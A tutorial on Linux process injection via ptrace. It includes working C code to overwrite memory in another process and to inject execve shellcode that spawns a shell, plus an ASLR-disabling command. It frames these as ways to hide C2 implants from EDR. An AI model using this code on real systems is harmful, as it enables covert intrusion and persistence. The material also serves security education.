Linux-Based Process Injection

Introduction

Cybercriminals, or pentesters, will always attempt to obscure their presence on compromised systems in some way to make identification by detection and response mechanisms, users, and administrators as difficult as possible. Some of these techniques involve disguising themselves as a legitimate system process or manipulating a legitimate process in such a way that it becomes part of the malicious process persisted by the agent.

The techniques described in this brief article also have many legitimate uses. One is patching running services: if a critical service needs a fix but cannot be terminated, the correction can be applied while it is executing. Another is debugging failing processes, where dynamic analysis can make it easier to find problems such as poor memory management or incorrect use of pointers.

However, once this level of interaction with a process is possible, a malicious agent can abuse it in various ways: altering the execution flow so that the process runs something that was not in its original instruction sequence, or reading data from memory, such as credentials and keys.

This type of tactic is also commonly employed in what is known as in-memory injection: one process infects another by injecting instructions and creating a new malicious thread in that other service. Also known as a fileless attack, it focuses on manipulating values in memory. Normally there is little need for other evasion techniques against anti-malware solutions, since few EDR (Endpoint Detection and Response) solutions perform dynamic memory analysis of processes, and because the malicious code itself is not written to disk, there is no file to analyze statically.

When deploying malware on a compromised server, such as an implant generated by a C2 framework (Metasploit, Cobalt Strike, Sliver, etc.), the malware must be started on the machine somehow: by a common executable file; by another file acting as a first stage that abuses some functionality of other services or software to execute it (VBA, JScript, HTA, or C for shellcode execution); or by embedding it in a template file that carries the instructions somewhere in the binary (calc.exe, as in so many examples). These models have some problems:

When the user closes the parent application, the implant will be terminated.
It may be easier for security software and blue teams to detect processes with suspicious behavior, such as MS Word (or, in our case, LibreOffice, because this is Linux) making periodic requests to domain X, executing many different system calls, and creating threads for no apparent reason.

To solve these problems, it can be useful to migrate the implant to another process: one that is rarely terminated, or whose behavior is closer to the implant's mode of operation and communication. This gives good persistence on the server and a good disguise for the attacker's backdoor.

Imagine an implant (Beacon) whose callback to the C2 (command and control) server is made over HTTP. This implant could be injected into an NGINX service as a worker. If NGINX is acting as a reverse proxy, making outbound requests is its normal behavior, so this would be a good way to disguise the communication.

How it is done in a Windows environment

On Linux-based operating systems, process injection cannot be done the same way as on Windows. Windows has many APIs intended for debugging that, when abused, make injection very easy and safe, without corrupting the target process.

The main functions abused by malware in the Windows environment are described below. OpenProcess opens (attaches to) an existing remote process for interaction. VirtualAllocEx is the extended version of the VirtualAlloc API; it can allocate n bytes in the attached process. WriteProcessMemory copies data to the remote process; the data (e.g., shellcode) is written into the previously allocated space. Finally, CreateRemoteThread creates a new thread in the remote process, which executes the new code. Anyone wanting to hide inside a legitimate process will abuse these APIs to achieve a complete disguise. Since these functions are easily flagged by antivirus solutions, there are many other Windows API functions (including undocumented ones) for each action that can be used to obfuscate the calls.

The order in which the functions are executed is fixed: any malware that uses the technique will show this same chain of calls, regardless of the programming language employed. This makes detection trivial.

Note that on Windows there is a function for every need, such as memory allocation or creation of a new thread. On Linux (and UNIX-like systems) the kernel exposes a single system call for this purpose, ptrace, which covers all the needs of debugging a process.

Other ways to inject instructions into Linux

The LD_PRELOAD environment variable allows dynamic libraries to be loaded at process startup. The functions exported by the preloaded library take priority over the original dependencies, which makes it possible to override a function with code that alters the original behavior of the program.

The technique has several limitations:

It only works for overriding functions that come from shared libraries.
It does not work for statically linked binaries or binaries that do not use the standard library.
It does not work for SUID binaries.
The library can only be configured at process startup.

Another common way is to use debugging software such as the GNU Debugger (GDB). It must be attached to the target process, which then allows C code to be executed inside that process. Inline assembly can be used to run instructions in the process, as in the following example, which executes /bin/bash in the target process, enabling something similar to process hollowing.

register char *x asm("%rdi") = "/bin/bash"; // Place the path pointer in rdi
asm(
		"xor %rsi,%rsi;" // Clear content of reg rsi
		"xor %rdx,%rdx;" // Clear content of reg rdx
		"mov $59,%rax;"  // Move 59 (execve) to rax
		"syscall;");     // Pass execution to the kernel

The problem is that it would be necessary to have GDB operating on the compromised machine. Installing it may become an opsec problem.

So, let's use ptrace.

Syscall ptrace

The ptrace system call gives the calling process the ability to observe and control the execution of another process. The process that does the monitoring is called the tracer; the process being monitored is called the tracee.

long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);

NR   Syscall  RAX   RDI           RSI       RDX                 R10
101  ptrace   0x65  Long Request  Long Pid  Unsigned Long addr  Unsigned Long Data

The tracer has a broad capacity for manipulation over the tracee process, enabling the reading and editing of registers, changing data at memory addresses allocated by the tracee and, consequently, manipulating the execution flow of the tracee process. ptrace is implemented in the kernel so it has full access to the task_struct process structure.

The ptrace function receives an action (request) as its first argument, which dictates the type of interaction with the tracee. The first action to use is the one that attaches the tracer to the tracee: PTRACE_ATTACH attaches to a single thread of the process, so if the process is multi-threaded each thread must be attached individually.
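
Since attaching happens per thread, a tracer first needs the list of thread IDs of the target. The following is a minimal sketch, assuming procfs is mounted at /proc; the helper name list_thread_ids is hypothetical and is not part of the code in the repository. It collects the numeric entries of /proc/<pid>/task, each of which is one thread ID.

```c
#include <assert.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: store up to max thread IDs of pid in tids.
 * Returns how many were stored, or -1 if /proc/<pid>/task cannot be opened. */
int list_thread_ids(pid_t pid, pid_t *tids, int max)
{
    assert(tids != NULL && max > 0);

    char path[64];
    snprintf(path, sizeof path, "/proc/%d/task", (int)pid);

    DIR *dir = opendir(path);
    if (dir == NULL)
        return -1;

    int count = 0;
    struct dirent *entry;
    while (count < max && (entry = readdir(dir)) != NULL) {
        char *end;
        long tid = strtol(entry->d_name, &end, 10);
        /* Keep purely numeric names only; this skips "." and "..". */
        if (end != entry->d_name && *end == '\0')
            tids[count++] = (pid_t)tid;
    }
    closedir(dir);
    return count;
}
```

Each ID returned could then be passed to PTRACE_ATTACH in turn. For a single-threaded process the list holds one entry, equal to the process ID.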

Implementations

Many common Linux programs and utilities use ptrace to give system administrators more control over process execution and to help with troubleshooting. One example is strace, which monitors system calls.

We can watch strace at work by tracing a process we can manipulate, in this case python. I just started a REPL (Read Eval Print Loop) and ran strace against the process ID of that python process, filtering on the openat call. Without the filter the output would be extremely noisy, and finding what we want would be almost impossible.

╰─$ python3
Python 3.8.10 (default, Mar 13 2023, 10:26:41)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> open("./history.txt","rb")
<_io.BufferedReader name='./history.txt'>

Right after the file was opened, strace printed a new line, captured through ptrace, with the system call and the arguments used.

╰─$ strace -e openat -p 3330
strace: Process 3330 attached
openat(AT_FDCWD, "./history.txt", O_RDONLY|O_CLOEXEC) = 3

The call returned file descriptor 3, which was just created and now refers to the opened file.

Changing a string in memory

This example changes a string in another process (the tracee). For this to be possible we need the process ID and the memory address at which the string is allocated in the remote process.

The complete code of both programs can be found on GitHub.

The following code, which will be used as the target process, starts by allocating a small buffer on the heap. A string that fits in it is copied into this memory, and then the string and its memory address are printed to the terminal. This address is important, as the bytes will be modified starting from it.

Disabling ASLR (turning off address randomization) may make the process simpler:

echo 0 > /proc/sys/kernel/randomize_va_space
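
Before changing the setting, it can help to check its current value. A minimal sketch, assuming the usual procfs path; the helper name read_aslr_mode is hypothetical. The kernel reports 0 (randomization off), 1 (conservative) or 2 (full).

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: read the ASLR mode from the given procfs file.
 * Returns 0, 1 or 2 as reported by the kernel, or -1 if it cannot be read. */
int read_aslr_mode(const char *path)
{
    assert(path != NULL);

    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;

    int mode = -1;
    if (fscanf(f, "%d", &mode) != 1)
        mode = -1;
    fclose(f);
    return mode;
}
```

Calling read_aslr_mode("/proc/sys/kernel/randomize_va_space") before and after the echo command shows whether the change took effect.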

The program needs to pause so that the other program, which does the injection, can run; afterwards it shows whether the string was changed or not. To pause it, there is a scanf waiting for a number, which we will type in later.

Content of the proc.c file.

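#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
	char *m = malloc(6);               // "hello" plus the terminating NUL byte
	strcpy(m, "hello");
	int n;
	printf("%s - %p\n", m, (void *)m);
	scanf("%d", &n);                   // Pause until a number is typed
	printf("%s - %p\n", m, (void *)m);
}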

Running this code, the following data is directed to the output. The process is now waiting for input.

~$ ./proc
hello - 0x55c1e3bfd2a0

Now we need the process ID.

30698 pts/1    S+     0:00 ./proc

The other program is the one that performs the injection. It declares a pid_t variable holding the process ID and a string holding the address at which the target string is allocated in the target process. Finally, it declares the message that will be written into the remote process and the length of that message.

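pid_t pid = 30698;            // Process ID of the target
char *p = "0x55c1e3bfd2a0";   // Address printed by the target
char *m = "mundo";            // Replacement string
int mlen = (int)strlen(m);    // Number of bytes to copy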

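A couple of messages help to debug the actions (address is the numeric form of p, obtained with the conversion described next). The cast to void * is what the %p format formally expects.

printf("Remote data pointer: %p\n", (void *)address);
printf("Local data pointer:  %p\n", (void *)m);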

The variable p holds the memory address as a string. To use it to locate the string that will be modified, it must be converted to a number: strtoull() returns the unsigned long long value represented by the string. That value can then be passed to ptrace() as the destination address.

unsigned long long address = strtoull(p, NULL, 16);
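
The conversion above accepts any input silently. A slightly more defensive variant is sketched below; the helper name parse_hex_address is hypothetical. It rejects empty input, trailing garbage and out-of-range values, which avoids writing to address 0 when the argument is mistyped.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>

/* Hypothetical helper: parse a hexadecimal address such as "0x55c1e3bfd2a0".
 * Returns 0 and stores the value in *out, or -1 on malformed or
 * out-of-range input. The "0x" prefix is optional with base 16. */
int parse_hex_address(const char *text, unsigned long long *out)
{
    assert(text != NULL && out != NULL);

    char *end = NULL;
    errno = 0;
    unsigned long long value = strtoull(text, &end, 16);

    /* No digits consumed, leftover characters, or overflow. */
    if (end == text || *end != '\0' || errno == ERANGE)
        return -1;

    *out = value;
    return 0;
}
```

With the address printed by the target, parse_hex_address("0x55c1e3bfd2a0", &address) returns 0 and leaves 0x55c1e3bfd2a0 in address.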

After the declarations and conversions that will be used in the course of execution, it is possible to attach to the process using the ID.

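ptrace(PTRACE_ATTACH, pid, NULL, NULL);

After attaching, the tracer must wait for the tracee to stop before touching it: PTRACE_ATTACH sends the tracee a SIGSTOP, and the stop is typically collected with waitpid(). This is implemented in the final code.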
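
One way to do this waiting step is sketched below. It is an illustration under assumptions, not the code from the repository: the helper name attach_and_wait is hypothetical, and it handles a single thread only.

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: attach to pid and block until it reports the stop.
 * Returns 0 once the tracee is stopped, -1 on failure. */
int attach_and_wait(pid_t pid)
{
    assert(pid > 0);

    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1)
        return -1;

    int status = 0;
    pid_t got;
    do {
        got = waitpid(pid, &status, 0);   /* retry if a signal interrupts the wait */
    } while (got == -1 && errno == EINTR);

    return (got == pid && WIFSTOPPED(status)) ? 0 : -1;
}
```

Only after this function returns 0 is it safe to issue further requests such as PTRACE_POKEDATA or PTRACE_GETREGS. Depending on the Yama ptrace_scope setting of the machine, attaching to a process that is not a descendant of the tracer may require extra privileges.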

The following loop takes the message in local memory byte by byte and copies it to the remote process, starting at the collected address. Both memory addresses are incremented in step.

The copy is done with the PTRACE_POKEDATA action. The third argument is the memory address to be altered in the target process, and the fourth argument is the data to write.

The data argument is declared as a void pointer, but for PTRACE_POKEDATA it is interpreted as the value to write rather than as an address. Note that each call writes a whole machine word (8 bytes on x86-64), not a single byte: passing one char writes that char followed by zero bytes, and the next iteration overwrites those zeros with the next character. The last write therefore also zeroes the bytes right after the string.

for (int i = 0; i < mlen; i++, address++, m++) {
	printf("Write %p <- %p: %c\n", (void *)address, (void *)m, *m);
	// POKEDATA stores a full word whose lowest byte is *m
	ptrace(PTRACE_POKEDATA, pid, (void *)address, (void *)(long)*m);
}
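
Because PTRACE_POKEDATA always stores a full word, a common way to write an arbitrary number of bytes without disturbing their neighbours is to read the word with PTRACE_PEEKDATA, patch only the bytes of interest, and write it back. The sketch below shows that read-modify-write pattern; the helper names peek_bytes and poke_bytes are hypothetical, and both assume the tracee is already attached and stopped.

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: copy len bytes from the tracee at addr into dst. */
int peek_bytes(pid_t pid, unsigned long addr, void *dst, size_t len)
{
    assert(dst != NULL);
    unsigned char *out = dst;
    while (len > 0) {
        unsigned long base = addr & ~(sizeof(long) - 1); /* word-aligned start */
        size_t off = addr - base;
        size_t n = sizeof(long) - off;
        if (n > len)
            n = len;

        errno = 0;   /* -1 is a valid word, so errno tells errors apart */
        long word = ptrace(PTRACE_PEEKDATA, pid, (void *)base, NULL);
        if (word == -1 && errno != 0)
            return -1;

        memcpy(out, (unsigned char *)&word + off, n);
        addr += n; out += n; len -= n;
    }
    return 0;
}

/* Hypothetical helper: write len bytes from src into the tracee at addr,
 * preserving every byte outside [addr, addr + len). */
int poke_bytes(pid_t pid, unsigned long addr, const void *src, size_t len)
{
    assert(src != NULL);
    const unsigned char *in = src;
    while (len > 0) {
        unsigned long base = addr & ~(sizeof(long) - 1);
        size_t off = addr - base;
        size_t n = sizeof(long) - off;
        if (n > len)
            n = len;

        errno = 0;
        long word = ptrace(PTRACE_PEEKDATA, pid, (void *)base, NULL);
        if (word == -1 && errno != 0)
            return -1;

        memcpy((unsigned char *)&word + off, in, n);   /* patch in place */
        if (ptrace(PTRACE_POKEDATA, pid, (void *)base, (void *)word) == -1)
            return -1;

        addr += n; in += n; len -= n;
    }
    return 0;
}
```

With these helpers the string from this example could be replaced with one call, poke_bytes(pid, address, "mundo", 5), and the bytes after the fifth character would be left as they were.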

After the copy is complete, the tracer can detach from the target process.

ptrace(PTRACE_DETACH, pid, NULL, NULL);

The following block shows the data being transferred in detail.

Remote data pointer: 0x55c1e3bfd2a0
Local data pointer:  0x555555556017
Write 0x55c1e3bfd2a0 <- 0x555555556017: m
Write 0x55c1e3bfd2a1 <- 0x555555556018: u
Write 0x55c1e3bfd2a2 <- 0x555555556019: n
Write 0x55c1e3bfd2a3 <- 0x55555555601a: d
Write 0x55c1e3bfd2a4 <- 0x55555555601b: o

Continuing the target process, it is possible to see that the string was completely replaced by the word “mundo”.

1
mundo - 0x55c1e3bfd2a0

Executing code within a remote process

This next example outlines a way to change the execution flow of the target process, and then execute arbitrary instructions, such as from shellcode.

The first step in executing a sequence of instructions is to have those instructions available in the process's memory. Linux has no function like VirtualAllocEx; the closest approach is to use ptrace as in the previous example, copying data from one address to another.

Likewise, there is no function like CreateRemoteThread to create a new execution flow in the remote process. ptrace can stand in for it, because it has an action to read the registers, including the instruction pointer, which holds the address of the next instruction (in machine code) to be executed. With the PTRACE_POKETEXT action, the instructions are injected in sequence at the addresses the instruction pointer is about to pass through. The injected instructions can execute a fork to create a new subprocess, or use some other tactic to create a new thread. After the data is written the process is continued, the instruction pointer runs through the written bytes, and they are executed by the CPU.

The first step is to attach to the process.

ptrace(PTRACE_ATTACH, target, NULL, NULL);

The current state of the registers must be recorded first. The shellcode changes register values and usually does not put the original values back, so to avoid corrupting the process the registers must be restored after the injection.

struct user_regs_struct regs;
ptrace(PTRACE_GETREGS, target, NULL, &regs);
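
The save and restore steps can be wrapped with error checking, as in the sketch below. It is specific to x86-64 (struct user_regs_struct and the two requests differ on other architectures), the helper names are hypothetical, and the tracee is assumed to be attached and stopped.

```c
#include <assert.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#if defined(__x86_64__)
/* Hypothetical helper: copy the tracee's general-purpose registers into *saved.
 * Returns 0 on success, -1 on failure. */
int snapshot_registers(pid_t pid, struct user_regs_struct *saved)
{
    assert(saved != NULL);
    return ptrace(PTRACE_GETREGS, pid, NULL, saved) == -1 ? -1 : 0;
}

/* Hypothetical helper: write a previously saved register set back. */
int restore_registers(pid_t pid, const struct user_regs_struct *saved)
{
    assert(saved != NULL);
    return ptrace(PTRACE_SETREGS, pid, NULL, (void *)saved) == -1 ? -1 : 0;
}
#endif
```

Keeping the snapshot in its own variable, separate from any copy that gets modified, makes it possible to put the tracee back exactly as it was found if a later step fails.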

The source and destination addresses are handled as pointers to unsigned 4-byte integers, so 4 bytes of shellcode are passed per write.

A loop writes the bytes of the instructions, starting at the address held in the instruction pointer.

The index i is incremented by 4 on each iteration, since it counts the shellcode bytes already copied and each iteration writes 4 of them. This also makes the loop stop when the shellcode ends, instead of copying data beyond its limit.

In the repository code, some prints were added to show the process.

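uint32_t *s = (uint32_t *) shellcode; // Source: local shellcode, read 4 bytes at a time
uint32_t *d = (uint32_t *) regs.rip;  // Destination: current instruction pointer of the tracee

for (int i = 0; i < shellcodeLen; i += 4, s++, d++) {
	ptrace(PTRACE_POKETEXT, target, d, *s);
}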
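
The way a byte buffer is split into 4-byte values can be checked in isolation, without touching any process. The sketch below uses hypothetical helper names and assembles each value explicitly in little-endian order, which is what reading a uint32_t from memory yields on x86-64. It also zero-pads the last chunk, so a buffer whose length is not a multiple of 4 is never read past its end.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: pack up to 4 bytes starting at buf[offset] into a
 * little-endian 32-bit value. Positions at or beyond len count as zero. */
uint32_t chunk_at(const unsigned char *buf, size_t len, size_t offset)
{
    assert(buf != NULL);
    uint32_t word = 0;
    for (size_t k = 0; k < 4 && offset + k < len; k++)
        word |= (uint32_t)buf[offset + k] << (8 * k);
    return word;
}

/* Hypothetical helper: number of 4-byte writes needed to cover len bytes. */
size_t chunk_count(size_t len)
{
    return (len + 3) / 4;
}
```

For a 24-byte buffer chunk_count returns 6, and the bytes 50 48 31 d2 pack to 0xd2314850.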

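Finally, the registers are restored, with the instruction pointer advanced by 2. The tracee was interrupted inside a system call (the read behind scanf), and on resume the kernel rewinds the instruction pointer by 2 bytes, the length of the syscall instruction, to restart that call. The adjustment compensates for this, so execution lands on the first byte of the shellcode.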

regs.rip += 2;
ptrace(PTRACE_SETREGS, target, NULL, &regs);

The tracer then detaches from the tracee.

ptrace(PTRACE_DETACH, target, NULL, NULL);

To test this code I executed proc.c from the previous example. I found out the process ID is 19156.

./a.out
hello - 0x564a603702a0

As shellcode, I use a 24-byte sequence of instructions that executes /bin/sh.

0000000000000080 <_start>:
  000080:	50                   	push   %rax
  000081:	48 31 d2             	xor    %rdx,%rdx
  000084:	48 31 f6             	xor    %rsi,%rsi
  000087:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rbx
  00008e:	2f 73 68
  000091:	53                   	push   %rbx
  000092:	54                   	push   %rsp
  000093:	5f                   	pop    %rdi
  000094:	b0 3b                	mov    $0x3b,%al
  000096:	0f 05                	syscall

push rax      ; Pushes rax onto the stack
xor  rdx, rdx ; Zeroes the content of rdx
xor  rsi, rsi ; Zeroes the content of rsi
mov  rbx,'/bin//sh' ; Moves the byte sequence to rbx
push rbx      ; Pushes rbx onto the stack
push rsp      ; Pushes rsp (sp = stack pointer), which points to the bytes of rbx
pop  rdi      ; Pops that address into rdi, which now points to "/bin//sh"
mov  al, 59   ; Moves the execve syscall number into al
syscall       ; Passes execution to the kernel, which reads the syscall number from rax

The execve system call (59) takes three arguments: rdi, the filename of the program that the kernel will execute; rsi, a pointer to the argument vector; and rdx, a pointer to the environment variable vector.

The output of the tracer is shown in the following block. There were 6 write operations, each injecting 4 bytes into the tracee process.

Start injecting shellcode at 0x7f6ea3edcfd2
Writting from 0x55ddcee77056 - d2314850 to 0x7f6ea3edcfd2
Writting from 0x55ddcee7705a - 48f63148 to 0x7f6ea3edcfd6
Writting from 0x55ddcee7705e - 69622fbb to 0x7f6ea3edcfda
Writting from 0x55ddcee77062 - 732f2f6e to 0x7f6ea3edcfde
Writting from 0x55ddcee77066 - 5f545368 to 0x7f6ea3edcfe2
Writting from 0x55ddcee7706a - 50f3bb0 to 0x7f6ea3edcfe6
24 Bytes written
Continue from 0x7f6ea3edcfd4
Deataching from PID: 19156

The process was continued and a shell was started in the target.

╰─$ ./a.out
hello - 0x564a603702a0
$ ls
README.md  a.out  main.c  main1.c  proc.c
$ cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
...

When the registers are restored, the instruction pointer ends up back at the top, which is now the start of the shellcode. Execution continues, and the instruction pointer sweeps through the shellcode and executes it.

Conclusions

UNIX-based systems do not offer the same range of support for process manipulation as a Windows environment, but the ptrace function can still be relied on to meet those needs. The injection techniques have to be much more elaborate, and something that works on one architecture may not work on another, which makes them somewhat unstable. That is why we do not see major post-exploitation tools supporting process migration here: in many cases it may not work and, worse, it may corrupt the target process, which is a more critical problem.

This article serves as an introduction to the technique. As mentioned, I believe that process injection on Linux is underdeveloped, so I would like to build something more solid and eventually give post-exploitation tools the ability to migrate to and spawn in a remote process, as C2 tools already do well on Windows. Possibly the next article will be about injecting object files or shared libraries, but for that to be possible the foundation has to be very well understood.

References

Like all research I do, I forgot to save. But I will populate this area.